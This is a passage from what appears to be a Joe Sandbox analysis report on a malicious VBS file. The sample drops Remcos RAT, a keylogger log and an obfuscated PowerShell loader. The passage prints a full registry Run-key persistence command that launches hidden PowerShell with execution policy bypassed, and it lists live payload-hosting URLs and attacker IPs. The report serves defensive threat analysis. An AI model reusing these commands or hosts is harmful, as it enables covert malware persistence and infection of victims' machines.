                            https://analytics.paste.ee;powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://cdnjs.cloudflare.compowershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              http://gratitudeseekers.compowershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.3114097341.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDAFF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2283194941.000001ABE1AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB61A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2368812441.000001EB4D351000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://cdnjs.cloudflare.com;powershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3114097341.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDAFF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2283194941.000001ABE1AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB61A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2368812441.000001EB4D351000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://pastebin.compowershell.exe, 0000000D.00000002.2368812441.000001EB4D7FD000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://pastebin.compowershell.exe, 0000000D.00000002.2368812441.000001EB4D7F6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://secure.gravatar.compowershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://themes.googleusercontent.compowershell.exe, 00000004.00000002.2341736438.000001BDB1988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB032E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB0440000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                https://oneget.orgpowershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                104.20.4.235
                                		pastebin.comUnited States
                                		13335CLOUDFLARENETUStrue
                                188.114.97.3
                                		paste.eeEuropean Union
                                		13335CLOUDFLARENETUStrue
                                212.162.149.163
                                		unknownNetherlands
                                		64236UNREAL-SERVERSUStrue
                                191.252.83.213
                                		desckvbrat.com.brBrazil
                                		27715LocawebServicosdeInternetSABRtrue
                                173.231.247.100
                                		gratitudeseekers.comUnited States
                                		54641INMOTI-1UStrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1524804
                                Start date and time:2024-10-03 09:27:10 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 35s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:SKMBT_77122012816310TD0128_17311_XLS.vbs
                                Detection:MAL
                                Classification:mal100.rans.spre.troj.spyw.expl.evad.winVBS@37/31@4/5
                                EGA Information:
                                • Successful, ratio: 33.3%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 72
                                • Number of non-executed functions: 215
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target RegAsm.exe, PID 2820 because there are no executed function
                                • Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 4924 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 5424 because it is empty
                                • Execution Graph export aborted for target powershell.exe, PID 6764 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                03:28:06API Interceptor123x Sleep call for process: powershell.exe modified
                                03:28:56API Interceptor1008373x Sleep call for process: RegAsm.exe modified
                                09:28:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuw cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                09:28:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_vuw cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                104.20.4.235sostener.vbsGet hashmaliciousNjratBrowse
                                • pastebin.com/raw/V9y5Q5vv
                                sostener.vbsGet hashmaliciousXWormBrowse
                                • pastebin.com/raw/V9y5Q5vv
                                envifa.vbsGet hashmaliciousRemcosBrowse
                                • pastebin.com/raw/V9y5Q5vv
                                New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                • pastebin.com/raw/NsQ5qTHr
                                Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                • pastebin.com/raw/NsQ5qTHr
                                Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                • pastebin.com/raw/NsQ5qTHr
                                Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                • pastebin.com/raw/NsQ5qTHr
                                Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                • pastebin.com/raw/NsQ5qTHr
                                188.114.97.3QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                • filetransfer.io/data-package/758bYd86/download
                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                • filetransfer.io/data-package/58PSl7si/download
                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                • filetransfer.io/data-package/58PSl7si/download
                                payment copy.exeGet hashmaliciousFormBookBrowse
                                • www.cc101.pro/0r21/
                                BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • cloud.dellicon.top/1000/500/
                                jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                • www.rtprajalojago.live/7vun/
                                inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                • joxi.net/4Ak49WQH0GE3Nr.mp3
                                http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                pastebin.comsostener.vbsGet hashmaliciousNjratBrowse
                                • 104.20.4.235
                                sostener.vbsGet hashmaliciousXWormBrowse
                                • 104.20.4.235
                                3.dllGet hashmaliciousUnknownBrowse
                                • 104.20.3.235
                                6.dllGet hashmaliciousUnknownBrowse
                                • 104.20.4.235
                                5.dllGet hashmaliciousUnknownBrowse
                                • 104.20.3.235
                                dropbox.exeGet hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                dropbox.exeGet hashmaliciousUnknownBrowse
                                • 172.67.19.24
                                inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                • 104.20.3.235
                                q71n2VrEY3.exeGet hashmaliciousDCRatBrowse
                                • 172.67.19.24
                                lvHIHLt0b2.exeGet hashmaliciousDCRatBrowse
                                • 104.20.3.235
                                paste.eePurchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                • 188.114.96.3
                                sostener.vbsGet hashmaliciousNjratBrowse
                                • 188.114.97.3
                                sostener.vbsGet hashmaliciousXWormBrowse
                                • 188.114.96.3
                                NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                • 188.114.96.3
                                risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                • 188.114.97.3
                                NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                • 188.114.97.3
                                o45q0zbdwt.vbsGet hashmaliciousPureLog StealerBrowse
                                • 188.114.97.3
                                OIQ1ybtQdW.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                • 188.114.96.3
                                1iH5ABLKIA.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                • 188.114.96.3
                                vr65co3Boo.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                • 188.114.97.3

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUSDHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                • 172.67.216.244
                                Airwaybill#0587340231024.xla.xlsxGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                • 188.114.96.3
                                DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                • 172.67.216.244
                                GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 188.114.96.3
                                Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                • 188.114.97.3
                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                • 172.67.216.244
                                Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                • 188.114.96.3
                                08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                • 104.21.16.12
                                CLOUDFLARENETUSDHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                • 172.67.216.244
                                Airwaybill#0587340231024.xla.xlsxGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                • 188.114.96.3
                                DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                • 172.67.216.244
                                GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 188.114.96.3
                                Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                • 188.114.97.3
                                Payment proof.xlsGet hashmaliciousUnknownBrowse
                                • 172.67.216.244
                                Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                • 188.114.96.3
                                08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.26.12.205
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                • 104.21.16.12
                                UNREAL-SERVERSUS17279403077f885c827960b6e8c87068d24f6ff15ba15cc4b7b6b413aafc09161cfef75b30571.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                • 212.162.149.163
                                U9117neFFQ.exeGet hashmaliciousRemcosBrowse
                                • 204.10.160.136
                                DOdjjdr3LO.exeGet hashmaliciousRemcosBrowse
                                • 204.10.160.136
                                ejdc7iP3A7.vbsGet hashmaliciousRemcosBrowse
                                • 204.10.160.136
                                SecuriteInfo.com.BackDoor.AgentTeslaNET.42.31568.2849.exeGet hashmaliciousRemcosBrowse
                                • 204.10.160.136
                                Payment proof.xlsGet hashmaliciousRemcosBrowse
                                • 204.10.160.136
                                TT12822024.xlsGet hashmaliciousRemcosBrowse
                                • 204.10.160.136
                                R7Xrrix6Sx.exeGet hashmaliciousRedLineBrowse
                                • 212.162.149.53
                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                • 212.162.149.53
                                1DUCJGrpyb.exeGet hashmaliciousRemcosBrowse
                                • 204.10.160.136

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0ePurchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                GeriOdemeBildirimi942.rar.xlxs.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                justificante de transferencia.vbsGet hashmaliciousFormBookBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                Comprobante.lnk.lnkGet hashmaliciousLokibotBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                Hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                hesaphareketi-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100
                                sostener.vbsGet hashmaliciousNjratBrowse
                                • 104.20.4.235
                                • 188.114.97.3
                                • 173.231.247.100

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\1210\logs.dat

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):390
                                Entropy (8bit):3.4740975030424557
                                Encrypted:false
                                SSDEEP:6:6lJSd4b5YcIeeDAlKe52WA6n+SkSJkJxw1gWA6n+SkSJkJxIWAv:6lJ+4Dec8e52W1+fZW1+feW+
                                MD5:2539CB3DB101C665DF0461110C7788BA
                                SHA1:0DF724AF5D4A22DCD1E03FED82495F0CE95D34BC
                                SHA-256:7E57DEF52FD95289C15C5B8CECB4B9BBEE0D94B97D8268C451CFF58D6ABC460E
                                SHA-512:C7F423DAC049860EA9CAF7D944C5C4C5595375C9FAE6393AFFA8967037207A8099EA0117603D3209D697122009F828E6B56A6B9871DF82CC7CF39699F7858676
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\1210\logs.dat, Author: Joe Security
                                Preview:....[.2.0.2.4./.1.0./.0.3. .0.3.:.2.8.:.2.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x.e.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (32656)
                                Category:dropped
                                Size (bytes):1801920
                                Entropy (8bit):3.8729557228520024
                                Encrypted:false
                                SSDEEP:12288:l1zabLuoSb0B5Yc8gjU3dNGeS5ra1SlxQjN4ZDZGNLjLYMxuIpsqd8fyjTDgn0N7:u3ZgoXOf1ssTv
                                MD5:E7C82FA422BC247B3AF1F0C6A98A76A6
                                SHA1:48E038FE5710A3C71D70EAF756A15C1A9F0ED576
                                SHA-256:5503E9420481271CBC5BA26F1B106CD2BB6E985CCE64183EC17A06EB0C6DBC59
                                SHA-512:5095BBE62CD54C4875393BD2398FF74B93048D81D94678F0407AA98EDA99B63219DB42685BEB4791B6B735684F98B27F2DD507362352EF09CBE701440484AAC1
                                Malicious:true
                                Preview:..$.d.q.s.x.B. .=. .'.C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.'. .+. .'.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.'. .+. .'.R.e.g.A.s.m...e.x.e.'.;.....$.f.V.L.F.U. .=. .'..!:..!'.;...$.j.u.N.m.Q. .=. .'.A.'.;.....$.W.Y.v.t.t. .=. .'.T.V.q.Q..!:..!.!:..!M..!:..!.!:..!.!:..!.!:..!E..!:..!.!:..!.!:..!.!:..!/./.8..!:..!.!:..!L.g..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!Q..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!g..!:..!.!:..!.!:..!.!:..!.!:..!4.f.u.g.4..!:..!t..!:..!n.N.I.b.g.B.T.M.0.h.V.G.h.p.c.y.B.w.c.m.9.n.c.m.F.t.I.G.N.h.b.m.5.v.d.C.B.i.Z.S.B.y.d.W.4.g.a.W.4.g.R.E.9.T.I.G.1.v.Z.G.U.u.D.Q.0.K.J..!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!.!:..!B.Q.R.Q..!:..!.!:..!T..!:..!E.D..!:..!G.G.g.7.G.Y..!:..!.!:..!.!:..!.!:..!.!:..!

                                C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (339), with no line terminators
                                Category:dropped
                                Size (bytes):339
                                Entropy (8bit):5.175513126663782
                                Encrypted:false
                                SSDEEP:6:sDuwZH1j0IQHjo54Zrcsny1R3KbQO0cbENjAuN723oH+B2KZmswVM45NHRn:sVVj0KsngkbQpcVuaYebwP7
                                MD5:B67C3BEA61F4F45F9E53772D98BD1F5E
                                SHA1:CFDA136843B843D21387A2C17A1F580920AE9EC4
                                SHA-256:42BFD66EF0E725A7C7E480C8CD8992519EF09F30BF3FF746F27E34A4422DB6DE
                                SHA-512:CA88CEC35C3EB3769B57C256254ECACB4C412426164C74880CAD3BE8A49A6FA11A4305F55A08D21B654D54CC4C0E7487DAB0A9F6D8794EBDFB25310817C4ADB2
                                Malicious:false
                                Preview:New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "Update Drivers NVIDEO_vuw" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman `". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' `";exit" -PropertyType "String" -force ; exit

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9434
                                Entropy (8bit):4.928515784730612
                                Encrypted:false
                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                MD5:D3594118838EF8580975DDA877E44DEB
                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                Malicious:false
                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllulh49//lz:NllUu9//
                                MD5:AADE84B9650AB09D8DC304B168D6D555
                                SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                                SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                                SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                                Malicious:false
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odjsreb.3ee.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30muupxy.oof.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

